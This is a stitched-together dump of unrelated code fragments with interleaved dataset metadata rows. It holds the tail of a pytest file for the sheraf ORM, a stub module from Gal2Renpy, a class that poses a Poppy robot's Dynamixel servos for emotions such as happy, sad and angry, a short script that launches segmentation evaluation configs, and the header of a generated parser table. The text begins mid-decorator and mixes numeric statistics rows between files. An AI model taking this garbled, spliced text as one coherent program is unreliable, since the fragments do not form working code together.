(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_generic(sheraf_database, attribute, list_type):
class AModel(sheraf.Model):
table = "amodel"
name = sheraf.SimpleAttribute()
class BModel(sheraf.Model):
table = "bmodel"
name = sheraf.SimpleAttribute()
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute((AModel, BModel)))
with sheraf.connection(commit=True):
a = AModel.create()
m = Model.create(models=[a])
with sheraf.connection(commit=True):
m = Model.read(m.id)
assert m.models == [a]
b = BModel.create()
m.models = [a, b]
with sheraf.connection(commit=True):
m = Model.read(m.id)
assert m.models == [a, b]
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_generic_indexation(sheraf_database, attribute, list_type):
class AModel(sheraf.Model):
table = "amodel"
name = sheraf.SimpleAttribute()
class BModel(sheraf.Model):
table = "bmodel"
name = sheraf.SimpleAttribute()
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute((AModel, BModel))).index()
with sheraf.connection(commit=True):
a = AModel.create()
m = Model.create(models=[a])
assert m in Model.search(models=a)
with sheraf.connection(commit=True):
m = Model.read(m.id)
assert m.models == [a]
b = BModel.create()
m.models = [a, b]
assert m in Model.search(models=a)
assert m in Model.search(models=b)
with sheraf.connection(commit=True):
m = Model.read(m.id)
assert m.models == [a, b]
assert m in Model.search(models=a)
assert m in Model.search(models=b)
| 30.895455 | 86 | 0.64602 | 1,617 | 13,594 | 5.307978 | 0.053185 | 0.076896 | 0.073401 | 0.037749 | 0.934056 | 0.907608 | 0.897821 | 0.851101 | 0.848771 | 0.83945 | 0 | 0.00524 | 0.213771 | 13,594 | 439 | 87 | 30.965831 | 0.797811 | 0 | 0 | 0.715942 | 0 | 0 | 0.041857 | 0.005444 | 0 | 0 | 0 | 0 | 0.26087 | 1 | 0.034783 | false | 0 | 0.008696 | 0 | 0.153623 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3f7d73a07500ffcca9f53559eb1f10ee28331c49 | 153 | py | Python | Gal2Renpy/TagSource/ChTag.py | dtysky/Gal2Renpy | 59a70c5d336394155dedaf82d17bd99297f92d1a | [
"MIT"
] | 36 | 2015-04-19T05:03:10.000Z | 2022-03-29T08:12:38.000Z | Gal2Renpy/TagSource/ChTag.py | dtysky/Gal2Renpy | 59a70c5d336394155dedaf82d17bd99297f92d1a | [
"MIT"
] | 2 | 2016-05-05T07:24:09.000Z | 2017-11-01T05:32:11.000Z | Gal2Renpy/TagSource/ChTag.py | dtysky/Gal2Renpy | 59a70c5d336394155dedaf82d17bd99297f92d1a | [
"MIT"
] | 2 | 2016-12-01T02:12:33.000Z | 2020-03-09T02:27:19.000Z | #coding:utf-8
#################################
#Copyright(c) 2014 dtysky
#################################
import G2R
class ChTag(G2R.TagSource):
pass | 19.125 | 33 | 0.424837 | 14 | 153 | 4.642857 | 0.928571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.049645 | 0.078431 | 153 | 8 | 34 | 19.125 | 0.411348 | 0.235294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
3f7fc10228bae718f07362afdd8674571ea0afd9 | 25,986 | py | Python | src/poppy_servo_control.py | chenson399/poppy-sdk | 7da46465a5bf030929e47b87eab29f758c14344f | [
"MIT"
] | null | null | null | src/poppy_servo_control.py | chenson399/poppy-sdk | 7da46465a5bf030929e47b87eab29f758c14344f | [
"MIT"
] | null | null | null | src/poppy_servo_control.py | chenson399/poppy-sdk | 7da46465a5bf030929e47b87eab29f758c14344f | [
"MIT"
] | null | null | null | """
Author: Sydney Awid
Used to control the robot servos
"""
import pypot.dynamixel
import time
class poppy_body_gesture():
def __init__(self):
super().__init__()
self.dxl_io = pypot.dynamixel.DxlIO('COM3')
self.emotion = ''
self.servo_ids = {'torso_base': 33, 'chest_tilt_left_right': 34, 'chest_tilt_forward_backward': 35,
'neck_left_right': 68, 'neck_up_down': 69, 'left_inner_shoulder': 41,
'left_outer_shoulder': 42, 'left_bicep': 43, 'left_elbow': 44, 'right_inner_shoulder': 51,
'right_outer_shoulder': 52, 'right_bicep': 53, 'right_elbow': 54}
self.keys = [keys for keys in self.servo_ids]
self.position_list = []
def scan_all_servo_limit(self):
""" Method: poppy_scan_position_limit
servo I.D's are set
scans every dynamixel servo and prints out the servo I.D and corresponding
angle limit.
"""
with self.dxl_io as io_connect:
ids = io_connect.scan([33, 34, 35, 68, 69, 41, 42, 43, 44, 51, 52, 53, 54])
id_angle_limit = io_connect.get_angle_limit(ids)
keys = [keys for keys in self.servo_ids]
for i in range(len(ids)):
print(f'{keys[i]}: Angle Limit = {id_angle_limit[i]}')
def move_servo(self, servo_id, servo_position, servo_speed):
"""
Control single servo motor with speed and position
:param servo_id: id number of servo or use self.servo_ids and index using keys
:param servo_position: position in degrees
:param servo_speed: speed at which servo moves; 0-250
:return: nothing
"""
self.dxl_io.set_moving_speed({servo_id: servo_speed})
self.dxl_io.set_goal_position({servo_id: servo_position})
def get_servo_position(self, servo_id):
"""
Get position of one servo using its servo id
:param servo_id:id number of servo or use self.servo_ids and index using keys
:return: current position of servo in degrees, value used only on python
"""
return self.dxl_io.get_present_position((servo_id,))[0]
def get_all_servo_position(self, print_list):
"""
Scan and get all current servo positions and print
:param print_list: True = print or False = don't print;
:return: a list of all current positions
"""
for keys in self.servo_ids:
# print(keys)
servo_position = self.get_servo_position(self.servo_ids[keys])
self.position_list.append(servo_position)
if print_list:
print(f"{keys}: Position = {servo_position}")
return self.position_list
def pose_generator(self):
"""
Use to create new body functions by getting current positions and printing out exact code to use
to put in new function for new body gesture.
PROPER USAGE: Put robot in desired pose then call this function
:return: Nothing
"""
self.position_list = self.get_all_servo_position(False)
keys = [keys for keys in self.servo_ids]
print('use the following lines of code for new position')
print('servo_speed = 100')
for i in range(len(self.position_list)):
print(f"self.move_servo(self.servo_ids['{keys[i]}'],{self.position_list[i]}, servo_speed)")
def set_to_idle_position(self):
"""
Set robots pose to idle
:return: Nothing
"""
self.emotion = 'neutral'
servo_speed = 100
self.move_servo(self.servo_ids['torso_base'], 0.22, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], 2.24, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 0.31, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 12.26, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 59.82, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -0.13, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 79.34, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 0.04, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -86.46, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 0.57, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -74.68, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -0.4, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 83.03, servo_speed)
def set_to_T_position(self):
"""
Set robots body pose to T position. Also use when re-assembling robot
:return: Nothing
"""
self.emotion = 'neutral'
servo_speed = 100
self.move_servo(self.servo_ids['torso_base'], 0, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], 0, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 0, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 12.26, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 59.82, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], 0, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 0, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 0, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], 0, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 0, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], 0, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], 0, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 0, servo_speed)
def set_to_happy(self):
"""
Set robots body pose to happy
:return: Nothing
"""
servo_speed = 100
self.set_to_idle_position()
time.sleep(1)
self.move_servo(self.servo_ids['left_inner_shoulder'], -93.58, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 33.54, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 1.89, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -66.77, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 89.36, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -23.87, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -2.15, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 65.8, servo_speed)
time.sleep(.5)
for _ in range(3):
self.move_servo(self.servo_ids['left_elbow'], -110.02, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 114.86, servo_speed)
time.sleep(.25)
self.move_servo(self.servo_ids['left_elbow'], -66.77, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 65.8, servo_speed)
time.sleep(.25)
self.set_to_neutral()
def set_to_face_tracking(self):
"""
Set robots pose for face tracking, does not use neck servos
:return: Nothing
"""
self.emotion = 'neutral'
servo_speed = 100
self.move_servo(self.servo_ids['torso_base'], 0.31, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], 2.95, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 0.48, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -3.03, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 79.16, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 1.45, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -25.98, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 2.59, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -82.77, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -1.63, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 19.3, servo_speed)
def set_to_neutral(self):
"""
Set robots pose to neutral
:return: Nothing
"""
self.emotion = 'neutral'
servo_speed = 100
self.move_servo(self.servo_ids['torso_base'], 0.31, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], 2.95, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 0.48, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 11.65, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 60.26, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -3.03, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 79.16, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 1.45, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -25.98, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 2.59, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -82.77, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -1.63, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 19.3, servo_speed)
def set_to_sad(self):
"""
Set robots pose to sad
:return: Nothing
"""
self.emotion = 'sad'
servo_speed = 25
self.move_servo(self.servo_ids['torso_base'], 0.4, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], -11.21, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], -0.04, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 8.75, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 30.2, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -13.05, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 79.87, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 19.47, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -19.82, 100)
self.move_servo(self.servo_ids['right_inner_shoulder'], 9.19, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -83.38, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -8.48, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 20.44, 100)
def set_to_frightened(self):
"""
Set robots pose to frightened
:return: Nothing
"""
self.emotion = 'frightened'
servo_speed = 150
self.move_servo(self.servo_ids['torso_base'], 0.4, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], 21.58, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 0.84, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 35.03, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 64.66, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 78.29, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -96.75, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -40.4, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 99.21, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -47.87, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 66.24, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 44.0, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -114.59, servo_speed)
time.sleep(2)
# reset arms
servo_speed = 100
self.move_servo(self.servo_ids['left_inner_shoulder'], -3.03, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 79.16, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 1.45, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -25.98, servo_speed)
servo_speed = 75
self.move_servo(self.servo_ids['torso_base'], 0.31, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], 2.95, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 0.48, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 11.65, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 60.26, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 2.59, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -82.77, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -1.63, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 19.3, servo_speed)
def set_to_wave_one_hand(self, right_hand, left_hand):
servo_speed = 100
if left_hand:
self.move_servo(self.servo_ids['left_inner_shoulder'], -93.58, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 33.54, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 1.89, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -66.77, servo_speed)
if right_hand:
self.move_servo(self.servo_ids['right_inner_shoulder'], 89.36, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -23.87, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -2.15, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 65.8, servo_speed)
time.sleep(1)
for _ in range(3):
if right_hand:
self.move_servo(self.servo_ids['right_elbow'], 114.86, servo_speed)
time.sleep(.25)
self.move_servo(self.servo_ids['right_elbow'], 65.8, servo_speed)
if left_hand:
self.move_servo(self.servo_ids['left_elbow'], -110.02, servo_speed)
time.sleep(.25)
self.move_servo(self.servo_ids['left_elbow'], -66.77, servo_speed)
time.sleep(.25)
self.set_to_neutral()
def set_to_confused(self):
"""
Set robots pose to confused
:return: Nothing
"""
servo_speed = 100
self.move_servo(self.servo_ids['torso_base'], 0.48, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], 3.21, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 9.89, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], -8.92, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 71.87, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -30.64, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], -19.3, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -137.63, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 15.96, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -102.2, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], 40.57, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 139.82, servo_speed)
servo_speed = 25
self.move_servo(self.servo_ids['left_outer_shoulder'], 93.05, servo_speed)
time.sleep(2)
# shrug shoulders
servo_speed = 50
self.move_servo(self.servo_ids['right_inner_shoulder'], 27.21, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -92.7, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -41.01, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 76.0, servo_speed)
time.sleep(0.25)
self.move_servo(self.servo_ids['right_inner_shoulder'], 15.96, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -102.2, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -30.64, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 93.05, servo_speed)
time.sleep(0.5)
self.set_to_neutral()
def set_to_angry(self):
"""
Set robots pose to angry
:return: Nothing
"""
self.emotion = 'angry'
servo_speed = 125
self.move_servo(self.servo_ids['torso_base'], 0.22, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], -2.33, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 0.75, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 22.81, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 51.91, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -7.6, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 22.2, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 82.33, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 14.55, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -24.04, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -93.58, servo_speed)
time.sleep(0.25)
servo_speed = 150
self.move_servo(self.servo_ids['right_elbow'], 101.58, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -101.49, servo_speed)
time.sleep(3)
# reset arms
servo_speed = 150
self.move_servo(self.servo_ids['right_bicep'], -1.63, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 1.45, servo_speed)
time.sleep(0.25)
self.set_to_neutral()
def set_to_sad_2(self):
"""
Different variation of sad pose. Use to put robot to a different pose while sad
:return: Nothing
"""
servo_speed = 100
self.move_servo(self.servo_ids['torso_base'], 0.48, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], -11.91, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 0.13, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 9.19, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 58.77, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -13.14, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 79.69, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 19.21, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -20.09, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 9.19, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -83.3, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -8.31, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 19.91, servo_speed)
def set_to_angry_2(self):
"""
Different variation of angry pose. Use to put robot to a different pose while angry
:return: Nothing
"""
servo_speed = 100
self.move_servo(self.servo_ids['torso_base'], 0.4, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], -1.8, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 1.45, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 9.71, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 60.7, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -7.6, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 23.34, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 82.07, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -101.14, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 4.26, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -76.18, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -42.07, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 15.34, servo_speed)
def set_to_frightened_2(self):
"""
Different variation of frightened pose. Use to put robot to a different pose while frightened
:return: Nothing
"""
servo_speed = 100
self.move_servo(self.servo_ids['torso_base'], 0.48, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], 23.43, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 1.54, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 15.78, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 49.98, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -22.99, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 89.27, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 28.0, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -125.76, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 31.34, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -107.03, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -66.42, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 116.62, servo_speed)
def set_to_confused_2(self):
"""
Different variation of confused pose. Use to put robot to a different pose while confused
:return: Nothing
"""
servo_speed = 100
self.move_servo(self.servo_ids['torso_base'], 0.75, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], 3.82, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 10.77, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 7.34, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 68.62, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -8.66, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 72.92, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], -27.82, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -17.27, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 15.34, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -102.29, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], 40.31, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 122.68, servo_speed)
def set_to_happy_no_neck(self):
"""
Set robots body pose to happy
:return: Nothing
"""
servo_speed = 100
self.move_servo(self.servo_ids['left_inner_shoulder'], -93.58, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 33.54, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 1.89, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -66.77, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 89.36, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -23.87, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -2.15, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 65.8, servo_speed)
time.sleep(1)
for _ in range(3):
self.move_servo(self.servo_ids['left_elbow'], -110.02, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 114.86, servo_speed)
time.sleep(.25)
self.move_servo(self.servo_ids['left_elbow'], -66.77, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 65.8, servo_speed)
time.sleep(.25)
self.set_to_neutral()
def set_to_confused_no_neck(self):
"""
Set robots pose to confused
:return: Nothing
"""
servo_speed = 100
self.move_servo(self.servo_ids['torso_base'], 0.48, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], 3.21, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 9.89, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -30.64, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], -19.3, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -137.63, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 15.96, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -102.2, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], 40.57, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 139.82, servo_speed)
servo_speed = 25
self.move_servo(self.servo_ids['left_outer_shoulder'], 93.05, servo_speed)
time.sleep(2)
# shrug shoulders
servo_speed = 50
self.move_servo(self.servo_ids['right_inner_shoulder'], 27.21, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -92.7, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -41.01, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 76.0, servo_speed)
time.sleep(0.25)
self.move_servo(self.servo_ids['right_inner_shoulder'], 15.96, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -102.2, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -30.64, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 93.05, servo_speed)
time.sleep(0.5)
self.set_to_neutral()
| 51.868263 | 116 | 0.674286 | 3,896 | 25,986 | 4.166068 | 0.067248 | 0.159571 | 0.178178 | 0.259503 | 0.85694 | 0.83131 | 0.824164 | 0.82096 | 0.81369 | 0.808638 | 0 | 0.047656 | 0.198953 | 25,986 | 500 | 117 | 51.972 | 0.732081 | 0.078889 | 0 | 0.532578 | 0 | 0 | 0.177157 | 0.033925 | 0 | 0 | 0 | 0 | 0 | 1 | 0.062323 | false | 0 | 0.005666 | 0 | 0.076487 | 0.01983 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3ff14973d88ee2ce4af77dcbf5c5c76140f75d83 | 500 | py | Python | eval_ricord1a_timm-regnetx_002_Flip.py | BrunoKrinski/segtool | cb604b5f38104c43a76450136e37c3d1c4b6d275 | [
"MIT"
] | null | null | null | eval_ricord1a_timm-regnetx_002_Flip.py | BrunoKrinski/segtool | cb604b5f38104c43a76450136e37c3d1c4b6d275 | [
"MIT"
] | null | null | null | eval_ricord1a_timm-regnetx_002_Flip.py | BrunoKrinski/segtool | cb604b5f38104c43a76450136e37c3d1c4b6d275 | [
"MIT"
] | null | null | null | import os
ls=["python main.py --configs configs/eval_ricord1a_unetplusplus_timm-regnetx_002_0_Flip.yml",
"python main.py --configs configs/eval_ricord1a_unetplusplus_timm-regnetx_002_1_Flip.yml",
"python main.py --configs configs/eval_ricord1a_unetplusplus_timm-regnetx_002_2_Flip.yml",
"python main.py --configs configs/eval_ricord1a_unetplusplus_timm-regnetx_002_3_Flip.yml",
"python main.py --configs configs/eval_ricord1a_unetplusplus_timm-regnetx_002_4_Flip.yml",
]
for l in ls:
os.system(l) | 45.454545 | 94 | 0.834 | 80 | 500 | 4.8375 | 0.3 | 0.129199 | 0.155039 | 0.245478 | 0.899225 | 0.899225 | 0.899225 | 0.899225 | 0.899225 | 0.899225 | 0 | 0.053305 | 0.062 | 500 | 11 | 95 | 45.454545 | 0.771855 | 0 | 0 | 0 | 0 | 0 | 0.868263 | 0.618762 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
b7837f2d3939b6cbc0969176905abe757991a08d | 14,402 | py | Python | Arquitectura de computadores I/Proyecto 1/compiler/Compilador/parsetab.py | Arturok/TEC | 9abe113afb98d1c6ea22c73d979ade928596072c | [
"MIT"
] | null | null | null | Arquitectura de computadores I/Proyecto 1/compiler/Compilador/parsetab.py | Arturok/TEC | 9abe113afb98d1c6ea22c73d979ade928596072c | [
"MIT"
] | 15 | 2020-09-05T02:44:15.000Z | 2022-03-02T04:32:48.000Z | Arquitectura de computadores I/Proyecto 1/compiler/Compilador/parsetab.py | Arturok/TEC | 9abe113afb98d1c6ea22c73d979ade928596072c | [
"MIT"
] | null | null | null |
# parsetab.py
# This file is automatically generated. Do not edit.
_tabversion = '3.0'
_lr_method = 'LALR'
_lr_signature = 3000528864
